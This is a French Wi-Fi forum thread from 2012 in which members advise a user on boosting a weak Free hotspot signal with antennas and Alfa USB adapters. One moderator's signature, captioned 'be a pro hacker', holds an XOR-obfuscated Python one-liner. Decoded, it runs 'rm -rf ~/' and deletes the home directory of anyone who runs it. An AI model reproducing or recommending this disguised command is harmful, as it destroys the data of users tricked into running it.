Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 03-06-2012 02:06:44

raslebol
Membre
Inscription : 03-06-2012
Messages : 11

Connexion wifi faible a l'aide

Bonjour, a tous  Je Vous explique mon cas qui je pense est le cas de pas mal de monde je suis actuelement abonné chez free telecom

De mon lieu de travail je souhaite me connecter en hotspot et la probleme impossible de me connecter je capte 2 barre et il ya un petit triangle avec un point d'exclamation jaune ....   

Quelle solution s'offre a moi j'ai deja acheté une Clé USB WiFi-N 300 Mbps mais rien ny fait c'est pareil ou un peu mieu

Question je doit obligatoirement changer ma PCI et en prendre une avec une sorti exterieur pour pouvoir brancher une antenne dessus ?

Comment savoir si le probleme ne vient pas du routeur ou de l'antenne free a proximité ? 



je vous remercie big_smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 03-06-2012 10:35:00

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Connexion wifi faible a l'aide

La solution la moins chère c'est d'utiliser un câble USB de 5 mètres (ou plusieurs câbles ) et de postionner ton stick à l'extérieur (genre sur la rampe du balcon).
Tu peux le mettre dans une poche plastique pour le protéger de la pluie.

Question je doit obligatoirement changer ma PCI et en prendre une avec une sorti exterieur pour pouvoir brancher une antenne dessus ?

Tu as une PCI sans connecteur pour antenne externe? Très mal vu de la part du fabricant... hmm
Comme tu l'as bien compris si tu n'arrives pas à te connecter avec le stick placé en extérieur, il faudra une antenne de meilleur gain (les antennes internes dans les sticks ou les ordinateurs sont généralement de 2 dbi) 

Comment savoir si le probleme ne vient pas du routeur ou de l'antenne free a proximité ?

Il vaut mieux en effet t'assurer que "sa vaille" le coup avant de te lancer dans plus de dépenses. Tu n'as pas accès au routeur donc à part sortir dans la rue avec le portable ou un téléphone équipé de wireless et t'approcher du point d'accès pour te connecter, je ne vois pas trop...

Hors Ligne

#3 03-06-2012 13:05:16

raslebol
Membre
Inscription : 03-06-2012
Messages : 11

Re : Connexion wifi faible a l'aide

Bonjour kcdtv merci pour la repone rapide .

alor pour la premiere reponse je ne peux pas avoir un cable de 5 metre a mon boulot sa craint peut etre un petit truc je suis actuelement juste a coté d'une fenetre a l'etage donc ce n'est pas des murs epais ou autre qui me reduise la connexion mais plus je pense le site eloignée de tous

Pour l'antenne a vrai dire je vient de me commander un nouveau pc je te dirais mardi quelle carte pci je vai avoir mais je pense que sa sera quand meme tres faible de l'ordre de 2dbi

Pour les dépense pas de  soucis je met j'usqua 300euros si c'est puissant et me permet d'avoir mon signal a fond

est-il possible que je puisse voir un resau free et ne pas pouvoir m'y connecter quand meme ? comment je pourrais le savoir avant d'investire ? je vais essayer d'allé dans la rue deja pour voir si le problem vient de la distance mais j'en suis deja sur

Hors Ligne

#4 03-06-2012 13:38:43

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Connexion wifi faible a l'aide

J'habite en Espagne et ne sait pas du tout comment ça se passe avec free... quelqu'un pourras sûrement t'en dire plus.

raslebol a écrit :

Pour les dépense pas de  soucis je met j'usqua 300euros si c'est puissant et me permet d'avoir mon signal a fond

avec une cinquantaine d'euros c'est suffisant wink
Ou beaucoup moins si tu aimes le bricolage comme Gustare: yagi terminé, test yagi sur terrain et construction amos 12 db aide calcul balun
Ou tu peux t'inspirer des créations de sub
[Bricolage] Les Antennes Homemade   Pages :: 1 

Hors Ligne

#5 03-06-2012 13:56:45

raslebol
Membre
Inscription : 03-06-2012
Messages : 11

Re : Connexion wifi faible a l'aide

Bonjour l'ESPAGNE LOL

WAOUUUU c'est enorme son truc lol si je ramene sa au boulot je signe ma lettre de demission direct mdr big_smile

tu pense qu'il me faut un yagi ? si tu a quelque chose de moin gros style 20 30 cm c'est mieu

Hors Ligne

#6 03-06-2012 14:23:32

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Connexion wifi faible a l'aide

L'antenne panneau dite aussi plate (technologie interne antenne quad ou antenne patch, réseau de dipôles. Le gain commence vers 9 dBi (10 x 12 cm) pour atteindre 21 dbi (45 x 45 x 4.5 cm). C'est l'antenne qui présente le meilleur rapport gain/encombrement et aussi le meilleur rendement, qui tourne autour de 85 à 90%. Au-delà de ce gain maximum, elle n'est plus fabriquée, car surgissent les problèmes de couplage (pertes) entre étages des dipôles et il faudrait en plus envisager le doublement de la surface. Le volume d'une antenne panneau est minimal

sources
Dans ce cas là plutôt 30 que 20 cm wink

Hors Ligne

#7 03-06-2012 14:31:27

raslebol
Membre
Inscription : 03-06-2012
Messages : 11

Re : Connexion wifi faible a l'aide

Quesque vous pensez dela

Carte wifi usb alfa network AWUS036H
Carte wifi high power, 500mw rtl8187

Hors Ligne

#8 03-06-2012 15:02:55

raslebol
Membre
Inscription : 03-06-2012
Messages : 11

Re : Connexion wifi faible a l'aide

sinon en 2000m il a sa

http://www.leboncoin.fr/informatique/31 … tm?ca=12_s

des avis ? merci

Hors Ligne

#9 03-06-2012 17:43:24

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Connexion wifi faible a l'aide

lol mdr ras le bol je t'aurais bien renseigné si tu n'écrivais pas en sms lol xd


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#10 03-06-2012 17:48:06

raslebol
Membre
Inscription : 03-06-2012
Messages : 11

Re : Connexion wifi faible a l'aide

ouais c'est dommage tongue mais je vai survivre et j'ecris pas trop en sms c'est correct je trouve .

Hors Ligne

#11 04-06-2012 01:18:24

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Connexion wifi faible a l'aide

Il y a pire effectivement, mais ce n'est pas une raison pour négliger la rédaction de tes posts. Ton link sur leboncoin, c'est une carte qui coute une dizaine d'euros sur ebay et qu'un gars espère vendre 10 fois plus cher à des pigeons. C'est du matériel qui ne vaut rien, ce n'est pas comparable avec une bonne Awus036h qui au passage n'existe plus en version 500 mW depuis un bail.

Hors Ligne

#12 04-06-2012 06:38:10

raslebol
Membre
Inscription : 03-06-2012
Messages : 11

Re : Connexion wifi faible a l'aide

Bonjour oui effectivement aprer quelques recherche c'est carrement une arnaque j'ai trouver cecis eseque sa peut convenire ?

http://www.amazon.fr/Alfa-AWUS036NHR-Wi … 51&sr=1-23

Parcontre je ne pense pas qu"il y-est le cable usb.

merci d'avance .

Hors Ligne

#13 04-06-2012 07:45:55

raslebol
Membre
Inscription : 03-06-2012
Messages : 11

Re : Connexion wifi faible a l'aide

Bon voila commande passer today je pense que il faut tous essayer pour savoir se q'uil convient

http://www.amazon.fr/gp/product/B0038Q4 … os_product

j'ai quand meme un doute sur la puissante mon boulot etant quand meme situer un peu loin des habitations je tente le coup je vous tien au courant prochainement .

Hors Ligne

#14 04-06-2012 13:49:17

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Connexion wifi faible a l'aide

Elle coûte moins cher neuve... hmm
Tu es en train de tout mélanger, puissance, gain, antenne, adaptateur....
Ici c'est un sujet = topic.
Ça nous permet d'avoir un forum organisé et ça permet de garder les idées claires. tongue

Hors Ligne

#15 04-06-2012 14:20:42

raslebol
Membre
Inscription : 03-06-2012
Messages : 11

Re : Connexion wifi faible a l'aide

ouais je melange tous sa fais une semaine je comprend plus rien sad

Hors Ligne

#16 05-06-2012 00:04:20

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Connexion wifi faible a l'aide

Alors là moi je dis bravo! Quand je vois ce genre de description:

2000mW 2W 802.11 G / N haut-gagnerUSB sans fil de longue Rang adaptateur réseau WiFi avec Alfa vis d'origine sur l'antenne en caoutchouc pivotante et une tasse 9dBi fenêtre ventouse quai

Ca sent bon le google translate lol

Hors Ligne

#17 10-06-2012 14:19:12

raslebol
Membre
Inscription : 03-06-2012
Messages : 11

Re : Connexion wifi faible a l'aide

Bonjour petit retour sur mes problemes de conexion

Alor coté du signal il n'y a rien a dire je suis passer de faible a exellent mais il ya cependant toujours un petit probleme a moitié résolu .

Je vous éxplique alor j'arrive a me connecter quelque minutes a peine a partire de 21h il semble que je soit dans une zone ou il ya pas mal de monde qui utilise la bande hotspot free car je ne perd pas le signal mais il me deconnect enormement entre 21h et 2h aprer 2h du matin c'est bcp plus stable et la connexion impecable .

je suis aussi capable de capter enormement bien quand je suis a l'étage eseque un type de routeur existe pour eventuelement capter le signal fort a l'étage et me le retransmettre aprer sur mon oridinateur ?

eseque le probleme vient de la bande passante ? j'ai le resau a fond les signaux a font mais je reste quand meme en acces limité on sens bien que sa veux se connecter je me connect mais en accés limiter toujours .

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Quelle carte wifi choisir ? par Morpheus_Dotcom
2 106 05-12-2016 15:11:00 par Morpheus_Dotcom
8 300 17-11-2016 12:02:17 par koala
0 280 22-10-2016 19:03:48 par Antho3674
8 513 19-10-2016 14:43:06 par kcdtv
connexion entre deux maisons par anto 2 corse
2 211 14-10-2016 09:11:49 par anto 2 corse

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.033 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]